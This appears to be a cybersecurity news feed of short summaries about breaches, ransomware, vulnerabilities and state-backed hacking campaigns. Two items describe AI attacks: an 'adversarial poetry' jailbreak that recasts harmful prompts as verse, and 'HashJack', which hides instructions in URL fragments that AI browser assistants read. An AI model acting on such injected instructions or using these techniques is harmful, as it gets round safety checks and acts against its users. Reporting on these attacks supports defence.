A hacking collective known as Scattered Lapsus$ Hunters has claimed responsibility for a large-scale supply chain attack that compromised the Salesforce data of over 200 organizations. The attack did not exploit a vulnerability in Salesforce itself, but rather abused OAuth tokens from the Gainsight customer-success application. The attackers gained unauthorized access to customer data, prompting Salesforce to revoke all tokens for the app. The group has named high-profile victims like Atlassian, Docusign, and Verizon, highlighting the significant risks of SaaS-to-SaaS integrations.

Dec 5, 20256 min read

New "Benzona" Ransomware Strain Discovered in the Wild

Security researchers at CYFIRMA have discovered a new ransomware strain named "Benzona." The malware encrypts files on Windows, macOS, and Linux systems, appending a ".benzona" extension and dropping a ransom note titled "RECOVERY_INFO.txt". Victims are instructed to use the TOR browser to access a chat portal for recovery negotiations. The threat actors behind Benzona are believed to use a variety of initial access vectors, including social engineering, botnets, and exploitation of software vulnerabilities.

Dec 5, 20254 min read

Critical 7-Zip RCE Vulnerability Now Under Active Exploitation

A critical remote code execution (RCE) vulnerability in the popular 7-Zip file archiver, tracked as CVE-2025-11001, is now being actively exploited in the wild. The path traversal flaw, which affects versions prior to 25.0.0, can be triggered when a user extracts a specially crafted malicious archive. This allows an attacker to write files to arbitrary locations and execute code. NHS England has issued an advisory confirming active exploitation, urging all organizations to update their installations immediately.

Dec 5, 20254 min read

CISA Exposes 'BRICKSTORM' Backdoor Used by Chinese State Actors to Infiltrate US Government

The US Cybersecurity and Infrastructure Security Agency (CISA), NSA, and Canadian Centre for Cyber Security have jointly exposed a sophisticated backdoor named 'BRICKSTORM'. According to the December 4, 2025 advisory, People's Republic of China (PRC) state-sponsored actors are using this malware to target government and IT sector organizations. BRICKSTORM is designed for stealth and long-term persistence in both VMware vSphere and Windows environments. It employs multi-layered encrypted communications, including DNS-over-HTTPS (DoH), to hide its C2 traffic. The advisory details an attack chain where actors used a web shell for initial access, moved laterally via RDP, and ultimately deployed BRICKSTORM on a VMware vCenter server to compromise domain controllers. Agencies are urged to hunt for this threat immediately.

Dec 4, 20256 min read

Android Zero-Days Under Active Attack, CISA Adds to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two high-severity Android zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The vulnerabilities, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), affect the core Android Framework on versions 13, 14, 15, and 16. Google's December 2025 security bulletin confirmed the flaws may be subject to 'limited, targeted exploitation,' a pattern often associated with sophisticated spyware campaigns. Federal agencies are now mandated to patch these vulnerabilities, and all Android users are urged to apply the latest security updates as soon as possible to protect against potential device compromise.

Dec 4, 20254 min read

Ransomware Payments Exceed $2.1 Billion Since 2022, FinCEN Reports

A new Financial Trend Analysis from the U.S. Treasury's Financial Crimes Enforcement Network (FinCEN), released December 4, 2025, reveals that financial institutions reported over $2.1 billion in ransomware-related payments between January 2022 and December 2024. The data, derived from Bank Secrecy Act (BSA) filings, shows a peak in 2023 with $1.1 billion in payments. The report identifies ALPHV/BlackCat, LockBit, and Akira as some of the most prevalent variants, with the manufacturing and financial services sectors being the most frequent victims. The analysis underscores the critical role of BSA reporting in tracking cybercrime trends and informing law enforcement actions.

Dec 4, 20254 min read

Freedom Mobile Data Breach Exposes Customer PII via Compromised Subcontractor

Canadian telecommunications provider Freedom Mobile announced on December 3, 2025, that it suffered a data breach after an unauthorized party gained access to its systems on October 23, 2025. The attacker leveraged the compromised account of a third-party subcontractor to access a customer account management platform. Exposed data includes customer names, addresses, birth dates, phone numbers, and account numbers. Freedom Mobile stated that more sensitive data like payment card information and passwords were not affected. The company is notifying a 'limited number' of affected individuals and advising them to be vigilant against phishing attacks.

Dec 4, 20254 min read

CISA KEV Alert: Actively Exploited ScadaBR Flaw Puts Industrial Control Systems at Risk

CISA has added CVE-2021-26828, a high-severity vulnerability in the OpenPLC ScadaBR industrial control system (ICS) software, to its Known Exploited Vulnerabilities (KEV) catalog as of December 3, 2025. The flaw, with a CVSS score of 8.7, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE) by uploading a malicious JSP file. This poses a significant risk to operational technology (OT) environments where this open-source SCADA solution is deployed. Federal agencies are mandated to patch by December 24, 2025, and CISA urges all organizations in critical infrastructure sectors to prioritize remediation.

Dec 4, 20255 min read

Under Armour Sued Over Data Breach Attributed to 'Everest' Cybercrime Group

Athletic apparel giant Under Armour is the target of a new class action lawsuit following a November 2025 data breach. The suit, reported on December 4, 2025, claims the company was negligent in protecting the personal information of consumers and employees. The breach was allegedly carried out by the 'Everest' cybercriminal group, which claims to have stolen and leaked hundreds of gigabytes of data. The lawsuit asserts that Under Armour failed to implement basic cybersecurity measures like encryption and did not provide timely notification to victims, who now face a heightened risk of identity theft and fraud.

Dec 4, 20254 min read

Critical Zero-Days in PyTorch Scanner 'PickleScan' Create AI Supply Chain Risk

Security firm JFrog has disclosed three critical zero-day vulnerabilities in PickleScan, a popular open-source tool used to scan Python pickle files for malware, particularly within the PyTorch AI framework. The flaws, collectively rated with a CVSS score of 9.3, allow an attacker to craft a malicious AI model that bypasses PickleScan's security checks. When this seemingly safe model is loaded by a user, it can lead to arbitrary code execution. This discovery, announced on December 3, 2025, highlights a significant software supply chain risk for the AI/ML community, as attackers could distribute weaponized models that evade standard security scanning.

Dec 4, 20255 min read

AWS Boosts Cloud Defense with New AI-Powered Security Tools at re:Invent 2025

At its re:Invent 2025 conference, Amazon Web Services (AWS) unveiled several major additions to its security portfolio, heavily infused with artificial intelligence. Key announcements on December 3, 2025, included the preview of AWS Security Agent, a context-aware tool for proactive application security testing throughout the development lifecycle. AWS also announced the general availability of its revamped AWS Security Hub for centralized cloud security posture management (CSPM) and new attack sequence findings in Amazon GuardDuty for better threat detection in EC2 and ECS environments. These updates aim to automate and enhance security operations for organizations in the cloud.

Dec 4, 20254 min read

React2Shell: Critical 10.0 CVSS RCE Hits React & Next.js, Actively Exploited!

A critical unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' and tracked as CVE-2025-55182, has been disclosed in React Server Components. With a maximum CVSS score of 10.0, the flaw affects popular frameworks like Next.js and allows attackers to take complete control of vulnerable servers. Security researchers have already observed active exploitation in the wild, with attackers attempting to harvest cloud credentials and deploy cryptocurrency miners. Major cloud providers have issued WAF rules as a temporary mitigation, but immediate patching is essential.

Dec 3, 20256 min read

ValleyRAT Malware Targets Job Seekers Using Foxit PDF Reader Disguise

A new malware campaign is distributing the ValleyRAT remote access trojan by preying on job seekers. Attackers send emails with weaponized executables disguised as HR documents, using the Foxit PDF Reader icon as a lure. The attack leverages a legitimate, renamed Foxit executable to perform a DLL side-loading attack, which silently loads the malware while displaying a decoy document to the victim. Once active, ValleyRAT provides attackers with full control over the compromised system, enabling data theft and surveillance.

Dec 3, 20255 min read

G7 Unveils New Framework for Coordinated Cyber Response in Financial Sector

The G7 Cyber Expert Group has published a new policy paper outlining non-binding principles for Collective Cyber Incident Response and Recovery (CCIRR) within the global financial sector. The framework, developed to foster greater cross-border cooperation, aims to improve information sharing, streamline crisis communication, and bolster the resilience of the international financial system against major cyber incidents. The principles are intended as a high-level guide rather than a set of regulatory requirements.

Dec 3, 20254 min read

EU Cyber Resilience Act Deadlines Loom: Vulnerability Reporting Starts 2026

The European Union is advancing the implementation of its landmark Cyber Resilience Act (CRA), which establishes mandatory cybersecurity requirements for all hardware and software products sold in the EU. With the regulation now in force, key deadlines are approaching. Manufacturers must prepare for a critical milestone in September 2026, when obligations to report actively exploited vulnerabilities to authorities within 24 hours will begin. The act aims to enforce security-by-design and ensure products remain secure throughout their lifecycle.

Dec 3, 20255 min read

Qilin Ransomware Gang Claims 7 of 11 New Victims in 24 Hours

The daily ransomware report for November 8, 2025, highlights a significant burst of activity from the Qilin ransomware group, which claimed responsibility for 7 of the 11 new victims announced in the past 24 hours. The DragonForce group was the second most active with three victims. The attacks primarily targeted the professional services and manufacturing sectors, with victims located in the United States, Canada, and the United Kingdom. This latest surge brings the total number of publicly claimed ransomware victims in 2025 to 6,364, underscoring the relentless and persistent threat that ransomware-as-a-service (RaaS) operations pose to organizations globally.

Dec 2, 20255 min read

SmartTube App Compromised: Malicious Update Pushed via Stolen Keys

A significant supply chain attack has compromised the popular ad-free YouTube client for Android TV, SmartTube. An attacker stole the developer's signing keys and distributed a malicious update containing surveillance-style malware through official channels. The malware, hidden in versions 30.43 through 30.55, collected device information and sent it to a command-and-control server. In response, Google Play Protect began automatically disabling the app on user devices. The developer has since revoked the compromised keys and released a new, clean version, which requires all users to perform a manual reinstallation to ensure their security.

Dec 2, 20255 min read

'Cryptomixer' Shut Down: Authorities Seize €25M in Bitcoin from Laundering Service

A coordinated international law enforcement action, codenamed "Operation Olympia," has successfully dismantled Cryptomixer.io, a major cryptocurrency mixing service. Led by Swiss and German authorities with significant support from Europol and Eurojust, the takedown resulted in the seizure of servers, 12 terabytes of data, and over €25 million in Bitcoin. The service, active since 2016, is believed to have laundered over €1.3 billion for a wide range of criminal groups, including ransomware gangs and the North Korean Lazarus Group, by obfuscating the trail of illicit funds.

Dec 2, 20254 min read

Iran-Linked MuddyWater APT Targets Israel with New 'MuddyViper' Backdoor

The Iranian-affiliated APT group MuddyWater has been observed in a new cyberespionage campaign targeting critical infrastructure and other key sectors in Israel and Egypt. Active from late 2024 to early 2025, the campaign leverages a previously undocumented custom C/C++ backdoor named MuddyViper. The malware is delivered via a loader called Fooder, which in some cases was disguised as the classic Snake game to deceive victims. The group, also known as Mango Sandstorm, used the backdoor for espionage, credential theft, and remote command execution, and showed operational overlap with another Iranian group, Lyceum.

Dec 2, 20256 min read

Lazarus APT's Remote IT Worker Infiltration Scheme Exposed in Real-Time

A joint investigation by security researchers has exposed the inner workings of a North Korean Lazarus Group scheme where operatives commit identity fraud to get hired as remote IT workers at Western firms. By luring the threat actors into a sophisticated honeypot environment, researchers from BCA LTD, NorthScan, and ANY.RUN were able to capture their tactics, techniques, and procedures (TTPs) in real-time. The scheme's goals are twofold: to gain persistent network access for espionage and to funnel salaries back to the Democratic People's Republic of Korea (DPRK) in violation of international sanctions.

Dec 2, 20256 min read

India Backs Down on Mandatory Pre-Installed Government "Snooping App"

Following widespread criticism from privacy advocates and significant resistance from major tech companies, the Indian government has withdrawn a controversial directive that would have required smartphone makers like Apple and Samsung to pre-install a non-deletable, state-owned security app. The app, named "Sanchar Saathi," was labeled a potential "snooping app" by critics, who raised concerns that it could be used as a tool for mass surveillance, violating citizens' right to privacy. The swift reversal marks a notable event in the ongoing global debate over digital privacy and government authority.

Dec 2, 20254 min read

AI Cybersecurity Firm Tenex Expands to EMEA with New Funding

AI-native cybersecurity firm Tenex announced its expansion into the Europe, Middle East, and Africa (EMEA) region on December 2, 2025. The strategic move is supported by a new Series A investment from the global investment firm DTCP. Tenex, which offers an AI-driven managed detection and response (MDR) service, has seen rapid growth since its founding in January 2025 and plans to establish an international headquarters in Europe in 2026 to capitalize on the region's demand and talent pool.

Dec 2, 20252 min read

CrowdStrike Named AWS Global Security and Marketplace Partner of the Year

At the AWS re:Invent 2025 conference, cybersecurity leader CrowdStrike was named both the Amazon Web Services (AWS) 2025 Global Security Partner of the Year and the Global Marketplace Partner of the Year. This dual recognition follows a landmark achievement for CrowdStrike, which became the first cloud-native independent software vendor (ISV) to surpass $1 billion in sales through the AWS Marketplace within a single calendar year, underscoring the strength of its cloud security offerings and its partnership with AWS.

Dec 2, 20253 min read

Coupang Breach Exposes 33.7 Million Users in South Korea

South Korean e-commerce leader Coupang has admitted to a significant data breach exposing the personal information of 33.7 million customers, impacting over half of South Korea's population. The breach, which began in June 2025 and was detected in mid-November, stemmed from authentication vulnerabilities and the potential misuse of an ex-employee's still-active authentication key. Exposed data includes names, emails, phone numbers, and addresses. Coupang has reset user passwords and is working with authorities, including the Korea Internet & Security Agency (KISA), on the investigation.

Dec 1, 20256 min read

Urgent Android Update: Google Patches 107 Flaws, Two Zero-Days Under Active Attack

Google has issued its December 2025 Android security bulletin, patching a total of 107 vulnerabilities. The update is critical, as it addresses two high-severity zero-days, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), which are under limited, targeted exploitation in the wild. The patch also fixes a critical remote denial-of-service (DoS) flaw, CVE-2025-48631, in the Android Framework. The update covers vulnerabilities in components from Qualcomm, Arm, MediaTek, and others, affecting Android versions 13 through 16. Users are urged to install the update as soon as it becomes available for their devices.

Dec 1, 20255 min read

APTs Exploit WinRAR Zero-Day to Target Industrial Sector in Q3 2025

Kaspersky's Q3 2025 threat report for industrial organizations highlights extensive exploitation of a WinRAR zero-day vulnerability, CVE-2025-8088. The flaw was used by multiple threat actors, including the RomCom cybercrime group and the Paper Werewolf (GOFFEE) APT, to deploy backdoors like SnipBot and the Mythic agent against industrial targets. The report also details other significant cyber-espionage campaigns, such as PhantomCore's attacks on Russian critical infrastructure and Cavalry Werewolf's phishing operations against energy and manufacturing sectors, underscoring the persistent threat to industrial control systems (ICS).

Dec 1, 20256 min read

FTC Slams EdTech Firm Illuminate Education Over Breach of 10M Students' Data

The U.S. Federal Trade Commission (FTC) has taken enforcement action against education technology provider Illuminate Education for a 2021 data breach that exposed the personal and health information of 10.1 million students. The FTC alleged the company failed to implement reasonable security measures, citing the attacker's use of credentials from an employee who had left 3.5 years prior. Under the settlement, Illuminate must implement a comprehensive security program, delete non-essential student data, and undergo third-party assessments, highlighting severe consequences for failing to protect children's data.

Dec 1, 20255 min read

Warning: Public PoC Exploit Released for Critical Zero-Click Outlook RCE Flaw

A proof-of-concept (PoC) exploit has been publicly released for CVE-2024-21413, a critical zero-click remote code execution (RCE) vulnerability in Microsoft Outlook nicknamed 'MonikerLink'. The flaw allows an attacker to execute arbitrary code on a victim's machine simply by sending a malicious email, with no user interaction required. The release of the PoC dramatically increases the risk of widespread exploitation. All organizations using affected versions of Outlook are urged to apply the security patches released by Microsoft immediately to prevent compromise.

Dec 1, 20255 min read

Mystery Breach: Major Tech Firm Exposes Millions of Users' Data

A major, but currently unnamed, technology company has reportedly suffered a massive data breach, exposing the personal data of millions of users worldwide. The breach was detected on November 24, 2025, after unusual activity was observed on the company's servers, stemming from an unspecified vulnerability. The company has reportedly shut down the compromised servers, notified authorities, and begun alerting users. This incident is being described as one of the largest in recent years, placing millions at risk of identity theft and phishing attacks.

Dec 1, 20255 min read

US Probes Bitcoin Mining Giant Bitmain for National Security Threats

The U.S. Department of Homeland Security is reportedly conducting a probe, codenamed 'Operation Red Sunset,' into Chinese bitcoin mining hardware manufacturer Bitmain. According to reports from November 29, 2025, the investigation centers on fears that Bitmain's mining devices could contain hidden backdoors for espionage or capabilities to sabotage the U.S. electrical grid. The probe allegedly involves physically inspecting imported hardware at U.S. ports for kill switches or remote access features. Bitmain has denied the allegations, but the investigation highlights growing national security concerns surrounding foreign-made hardware in critical infrastructure sectors.

Nov 30, 20255 min read

Yearn Finance Hit by $9M 'Infinite Mint' Exploit

On November 30, 2025, the DeFi protocol Yearn Finance was exploited for approximately $9 million. The attacker leveraged a flaw in a legacy yETH stableswap smart contract, using a deposit of just 16 wei (a fraction of a cent) to mint a massive 235 septillion yETH tokens. The vulnerability stemmed from the contract's failure to clear cached storage variables after liquidity was fully drained. By manipulating these phantom balances, the attacker triggered an 'infinite mint' condition, subsequently draining the pool's assets into a Balancer pool. Around $3 million was quickly laundered through the Tornado Cash mixer.

Nov 30, 20255 min read

Amazon Data Center Blueprints Leaked in Breach of Steel Contractor

A significant data breach at Cooper Steel Fabricators, a major U.S. structural steel contractor, was reported on November 30, 2025. A threat actor is selling a 330 GB database, claiming it is a 'complete mirror' of the company's FTP server. The asking price is $28,500. The leaked data allegedly contains highly sensitive intellectual property, including detailed blueprints and structural models for an Amazon data center in Ohio and a sorting facility in Massachusetts. Blueprints for Walmart distribution centers are also included, highlighting the severe supply chain risks that can expose the critical infrastructure plans of major corporations.

Nov 30, 20255 min read

Gaming Giant Netmarble Breached, 6.1 Million Users' Data Exposed

South Korean gaming company Netmarble confirmed on November 30, 2025, that it suffered a data breach on November 22, exposing the personal information of 6.11 million members of its PC game portal. The compromised data includes names, birthdates, and encrypted passwords. The leak also affected 66,000 PC cafe owners and 17,000 current and former employees. Netmarble came under fire for waiting nearly 72 hours to report the incident to the Korea Internet & Security Agency (KISA), raising concerns about its incident response transparency.

Nov 30, 20255 min read

CodeRED Alert System Hit by Ransomware, Wall Street Scrambles After Vendor Hack

A weekend news roundup from November 29, 2025, covered several major cyber incidents. The nationwide CodeRED emergency alert system, provided by OnSolve, was hit by an INC Ransom attack, disrupting a critical public safety service. In finance, Wall Street banks were assessing the fallout from a breach at a third-party real estate data firm, exposing ongoing supply chain risks. Additionally, the pro-Ukrainian hacktivist group Ukrainian Cyber Alliance claimed responsibility for a destructive attack on Donbas Post, the Russian-run postal service in occupied Ukraine, reportedly wiping over a thousand systems.

Nov 30, 20255 min read

Comcast Fined $1.5M by FCC for Vendor's Data Breach

Comcast has agreed to a $1.5 million settlement with the Federal Communications Commission (FCC) following a 2024 data breach at a former vendor. The breach occurred at Financial Business and Consumer Solutions (FBCS), a debt collection agency, and exposed the personal information of nearly 238,000 Comcast customers, including names, addresses, and Social Security numbers. FBCS filed for bankruptcy before disclosing the breach, leaving Comcast to face the regulatory fallout. As part of the settlement, Comcast will implement a stricter vendor security compliance plan, highlighting the growing regulatory expectation for companies to secure their entire supply chain.

Nov 30, 20255 min read

Global Infrastructure Breach Alert Confirmed as False Alarm

Initial reports on November 30, 2025, of a major security breach impacting global infrastructure were officially confirmed to be a false alarm. The panic was triggered when automated monitoring tools misinterpreted routine, benign system tests as a sophisticated cyberattack, leading to a cascade of incorrect alerts. While no data was stolen and no systems were compromised, the incident has exposed potential weaknesses in cyber-alerting systems and their ability to differentiate between normal administrative actions and genuine threats. The event has prompted calls for improving alert validation processes to maintain public trust.

Nov 30, 20254 min read

Asahi Confirms Qilin Ransomware Breach Exposed Data of Nearly 2 Million

Japanese beverage giant Asahi Group Holdings has confirmed a September 2025 ransomware attack by the Qilin group resulted in a massive data breach affecting 1.914 million individuals. The breach exposed the personal information of customers, employees, and business contacts, leading to significant operational disruptions, including production halts and product shortages. The attackers gained initial access through compromised network equipment and moved laterally to deploy ransomware across Asahi's domestic data centers. While no financial data was stolen, the exposed PII includes names, addresses, phone numbers, and dates of birth.

Nov 29, 20256 min read

Qilin's "Korean Leaks" Hits 28 Financial Firms via MSP Supply Chain Attack

The Qilin ransomware group has executed a devastating supply-chain attack, dubbed "Korean Leaks," by breaching GJTec, a South Korean managed service provider (MSP). This single point of failure allowed the attackers to compromise at least 28 of the MSP's downstream financial services clients. The campaign, which ran in waves from September to October 2025, resulted in the exfiltration of over 2TB of data. Researchers from Bitdefender have noted potential links to the North Korean state-affiliated group Moonstone Sleet, suggesting a hybrid operation blending financial extortion with geopolitical motives.

Nov 29, 20256 min read

TryHackMe Apologizes for All-Male Panel After Community Backlash

Cybersecurity training platform TryHackMe issued a public apology on November 28, 2025, after announcing an all-male list of 18 industry helpers for its popular "Advent of Cyber" event. The omission sparked significant backlash from the cybersecurity community regarding the lack of gender diversity and representation. The company acknowledged the mistake was unintentional, stating several female creators had been invited but were unavailable. TryHackMe is now actively working with community members to recruit and onboard women to the panel before the event's launch.

Nov 29, 20253 min read

Pakistan-linked APT36 Targets Indian Government with New Linux Malware

The Pakistan-based threat group APT36, also known as Transparent Tribe, is conducting an active cyber-espionage campaign against Indian government entities. A CYFIRMA report published on November 29, 2025, details the group's use of a new Python-based malware compiled for Linux systems (ELF format). This development signifies an expansion of APT36's toolkit to target non-Windows environments within sensitive Indian government and strategic sector networks, continuing the group's long-standing focus on intelligence gathering against India.

Nov 29, 20255 min read

North Korea's Cybercrime is Statecraft, Report Warns

A strategic intelligence report published by CYFIRMA on November 28, 2025, analyzes North Korea's increasing reliance on cybercrime as a core instrument of its statecraft. The report's release is timely, following Russia's 2024 veto that disbanded the UN Panel of Experts responsible for monitoring North Korean sanctions evasion. The analysis details how state-sponsored groups like the Lazarus Group conduct large-scale cyber operations, including cryptocurrency heists and ransomware attacks, to generate revenue that directly funds the nation's weapons programs and sustains the regime.

Nov 29, 20254 min read

Under Armour Investigates Ransomware Attack, Data Theft Claims

Athletic apparel giant Under Armour is investigating a ransomware attack that has impacted its internal corporate systems. According to a report from November 28, 2025, an unidentified ransomware group has claimed responsibility and alleges it has exfiltrated a large volume of data, including personal records for "millions of individuals." Under Armour has acknowledged the unauthorized access and launched a forensic investigation to determine the scope of the breach and verify the attackers' claims. The incident has caused internal disruptions and poses a significant data privacy risk.

Nov 29, 20255 min read

DoorDash Discloses Another Breach via Third-Party Vendor

Food delivery service DoorDash disclosed another data breach on November 27, 2025, resulting from a compromise at an unnamed third-party service provider. The incident, reported on November 28, exposed information belonging to both customers and delivery drivers. This breach marks the latest in a series of security incidents for DoorDash involving its supply chain, highlighting persistent vulnerabilities in its network of external vendors and raising concerns about the security of its platform.

Nov 29, 20255 min read

Oracle Cloud Misconfiguration Exposes Customer Data

Oracle has reported a data breach stemming from misconfigured resources within its own Oracle Cloud Infrastructure (OCI). The incident, first noted on November 13 and analyzed in a report on November 28, 2025, allowed external, unauthorized access to a portion of its cloud environment where customer data was stored. While the full scope and specific customers affected have not been detailed, the breach highlights the significant security challenges of managing large-scale cloud environments, demonstrating that even major cloud providers are susceptible to internal configuration errors.

Nov 29, 20254 min read

MaaS Provider TAG-150 Distributes Modular Loader and RAT

A Malware-as-a-Service (MaaS) provider, tracked as TAG-150, has been identified operating a campaign active since at least March 2025. According to a threat intelligence report from November 29, 2025, the group is distributing a modular loader that delivers a Remote Access Trojan (RAT). The operation is focused on information theft and leverages user interaction and living-off-the-land techniques to compromise systems. The campaign highlights the ongoing threat from the MaaS ecosystem, which provides cybercriminals with ready-made tools to conduct attacks.

Nov 29, 20254 min read

French Football Federation Data Breach Exposes Player Info Via Single Compromised Account

The French Football Federation (FFF) announced a significant data breach on November 28, 2025, after an attacker gained access to a centralized administrative software platform using a single compromised user account. The breach exposed the personally identifiable information (PII) of a large number of its 2.3 million members, including names, contact details, and birth dates. The attackers did not exploit a software vulnerability but rather leveraged stolen credentials to gain administrative control. In response, the FFF disabled the account, forced a password reset for all users, and notified both the French data protection authority (CNIL) and the national cybersecurity agency (ANSSI). This incident highlights the critical risk posed by credential compromise and the trend of cyberattacks targeting sports organizations.

Nov 28, 20256 min read

IT Professional Jailed for 7 Years in Australia for 'Evil Twin' Wi-Fi Attacks on Flights

An Australian IT professional, Michael Clapsis, has been sentenced to seven years and four months in prison for conducting sophisticated 'evil twin' Wi-Fi attacks. Using a Wi-Fi Pineapple device, he created rogue Wi-Fi hotspots at airports and on flights to trick travelers into entering their credentials into a phishing portal. Clapsis then used this access to infiltrate the online accounts of multiple women, stealing thousands of private images and videos. The Australian Federal Police (AFP) investigation began after airline staff reported a suspicious network. Clapsis also attempted to obstruct the investigation by deleting evidence and abusing his IT privileges at work to spy on meetings between his employer and the AFP.

Nov 28, 20255 min read

Massive Scan of Public GitLab Repositories Uncovers Over 17,000 Live Secrets

A security engineer, Luke Marshall, conducted a large-scale scan of all 5.6 million public repositories on GitLab Cloud, uncovering 17,430 verified, live secrets. The exposed credentials include thousands of API keys and access tokens for over 2,800 unique domains, with Google Cloud Platform (GCP) keys being the most common. The scan, performed using the open-source tool TruffleHog, highlights the pervasive issue of developers hardcoding secrets in public code. Alarmingly, 406 valid GitLab access tokens were found within GitLab's own repositories. The research also uncovered 'zombie secrets' that have remained valid for over a decade, posing a long-term risk. Marshall's responsible disclosure efforts led to multiple bug bounty payouts.

Nov 28, 20256 min read

Legacy Python Scripts Create Dormant Supply Chain Risk via Abandoned Domain

Security researchers at ReversingLabs have identified a long-dormant supply chain vulnerability within the Python ecosystem affecting packages that use the legacy 'zc.buildout' tool. Outdated bootstrap scripts (`bootstrap.py`) found in several PyPI packages contain hardcoded references to an abandoned domain, `python-distribute.org`. This domain, once used for a fork of the Setuptools project, is now for sale. An attacker could purchase the domain, host malicious code, and automatically compromise any developer or build system that runs one of these legacy scripts. This creates a direct vector for malware injection, exposing an unknown number of projects to a decade-old risk.

Nov 28, 20256 min read

'Adversarial Poetry' Emerges as Universal Jailbreak for Major LLMs

A new research paper has unveiled a simple yet powerful technique, dubbed 'adversarial poetry,' that can consistently bypass the safety guardrails of major Large Language Models (LLMs). By reformulating harmful prompts into verse, researchers were able to achieve jailbreak success rates up to 18 times higher than with plain text. The technique proved effective as a 'universal single-turn jailbreak' across 25 different AI models, including both proprietary and open-source ones. It successfully generated content related to dangerous topics like CBRN threats and cyber-offenses, revealing a fundamental weakness in current AI alignment strategies that appear overly sensitive to a prompt's style rather than its semantic content.

Nov 28, 20256 min read

Bloody Wolf APT Shifts Tactics, Using Legitimate RATs to Target Central Asian Governments

The cyber-espionage group 'Bloody Wolf' has expanded its campaign, now targeting government entities in Kyrgyzstan and Uzbekistan. According to research from Group-IB, the APT group has evolved its tactics, moving away from custom malware to a more streamlined, Java-based delivery method. The new attack chain tricks victims into installing the legitimate NetSupport Manager remote administration tool (RAT). By using a widely recognized commercial tool, Bloody Wolf aims to evade detection by blending its malicious activities with normal administrative network traffic, sustaining its long-term espionage and data exfiltration goals.

Nov 28, 20256 min read

CISA Adds Actively Exploited OpenPLC XSS Flaw to KEV Catalog After Hacktivist Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a cross-site scripting (XSS) vulnerability in OpenPLC ScadaBR, CVE-2021-26829, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on November 28, 2025, follows confirmed reports of active exploitation by the pro-Russian hacktivist group TwoNet. The group was observed using the flaw to deface the HMI of an industrial control system honeypot. The medium-severity vulnerability allows an attacker with access to the system to inject malicious scripts. Federal agencies are now required to patch the flaw by December 19, 2025, to protect against this confirmed threat to ICS/OT environments.

Nov 28, 20257 min read

Tomiris APT Refines Toolkit, Using Discord and Telegram for C2 in Diplomatic Attacks

The cyber-espionage group 'Tomiris' has upgraded its tactical arsenal in a new wave of attacks targeting diplomatic and government organizations in Russia and Commonwealth of Independent States (CIS) countries. According to a new report from Kaspersky, the APT group is now using public services like Discord and Telegram for command-and-control (C2) communications to better evade detection. The group uses tailored spear-phishing emails to deliver a variety of payloads, including reverse shells and custom backdoors, and deploys specialized 'FileGrabber' malware to steal documents, demonstrating a focus on long-term intelligence gathering.

Nov 28, 20256 min read

Major Cyberattack Hits Three London Councils, Crippling Public Services

A major cyber incident was declared on November 26, 2025, after a coordinated attack struck the shared IT infrastructure of three London councils: the Royal Borough of Kensington and Chelsea (RBKC), Westminster City Council (WCC), and the London Borough of Hammersmith and Fulham (LBHF). The attack disrupted essential services, including phone lines, for over half a million residents. The councils, which operate under a joint IT arrangement, were forced to activate emergency protocols to maintain critical functions. The UK's National Cyber Security Centre (NCSC) is assisting with the investigation. While the nature of the attack is unconfirmed, experts suspect it is a ransomware incident, potentially targeting a shared managed service provider (MSP), raising fears of a significant data breach involving sensitive citizen information.

Nov 27, 20256 min read

New 'HashJack' Attack Injects Malicious Prompts into AI Browsers

On November 26, 2025, researchers disclosed a novel indirect prompt injection attack called 'HashJack' that targets AI-enabled web browsers. The technique works by embedding malicious instructions in the fragment portion of a URL (the text following a '#' symbol). Because URL fragments are processed client-side and are not sent to the server, they are invisible to most network security tools like firewalls and web gateways. However, AI assistants integrated into browsers often parse the full URL, including the fragment, to gain context. This allows an attacker to craft a seemingly benign link that, when visited, secretly instructs the user's AI assistant to perform malicious actions, creating a significant new attack surface.

Nov 27, 20256 min read

Mitsubishi ICS Software Flaw Exposes Credentials in Plaintext

On November 27, 2025, Mitsubishi Electric issued a security advisory for CVE-2025-3784, an information disclosure vulnerability in its GX Works2 industrial control system (ICS) software. The flaw, which affects all versions of the software, involves the storage of credential information in plaintext within project files. An attacker with local access to a computer running the software could extract these credentials and use them to bypass authentication on project files, allowing them to view or modify critical industrial process information. The vulnerability has a CVSS score of 5.5. Mitsubishi is developing a patch and has provided interim mitigation guidance.

Nov 27, 20256 min read

Critical 10.0 CVSS Flaw in Azure Bastion Allows Full Cloud Takeover

Microsoft has patched a critical authentication bypass vulnerability, CVE-2025-49752, in its Azure Bastion service. The flaw, which scores a perfect 10.0 on the CVSS scale, could allow a remote, unauthenticated attacker to gain administrative control over all virtual machines connected via a vulnerable Bastion host. The vulnerability is a capture-replay flaw, where an attacker can intercept and reuse authentication tokens. All Azure Bastion deployments created before the patch on November 20, 2025, are considered vulnerable, and customers are urged to ensure their instances are updated.

Nov 27, 20255 min read

Asahi Breweries Crippled by Ransomware Attack, Shipments Plummet to 10% Ahead of Peak Holiday Season

Japan's largest brewer, Asahi Group Holdings Ltd., is facing severe operational paralysis more than a month after a devastating ransomware attack. The attack disabled the company's core order and shipment management system, forcing a regression to manual processes like phone calls and faxes. As a result, shipments are at only 10% of normal levels, a critical blow as the company enters its busiest sales month. The incident, which has also forced Asahi to postpone its Q3 earnings report, highlights the extreme vulnerability of complex supply chains and legacy IT systems to modern cyber threats.

Nov 26, 20255 min read

CodeRED Emergency Alert System Crippled by 'Inc Ransom' Attack, Disrupting US Public Safety

The OnSolve CodeRED emergency alert system, a critical communication tool for hundreds of U.S. municipalities, has been taken offline following a ransomware attack claimed by the 'Inc Ransom' group. The attack, which began on November 1, 2025, resulted in the encryption of systems and the exfiltration of user data, including names, addresses, and contact information. After failed ransom negotiations, the vendor was forced to decommission the legacy platform, causing significant service disruptions for local governments in numerous states and leaving them unable to issue vital public safety notifications.

Nov 26, 20256 min read

Geopolitical Shift: Russian and North Korean State Hackers Found Sharing Attack Infrastructure

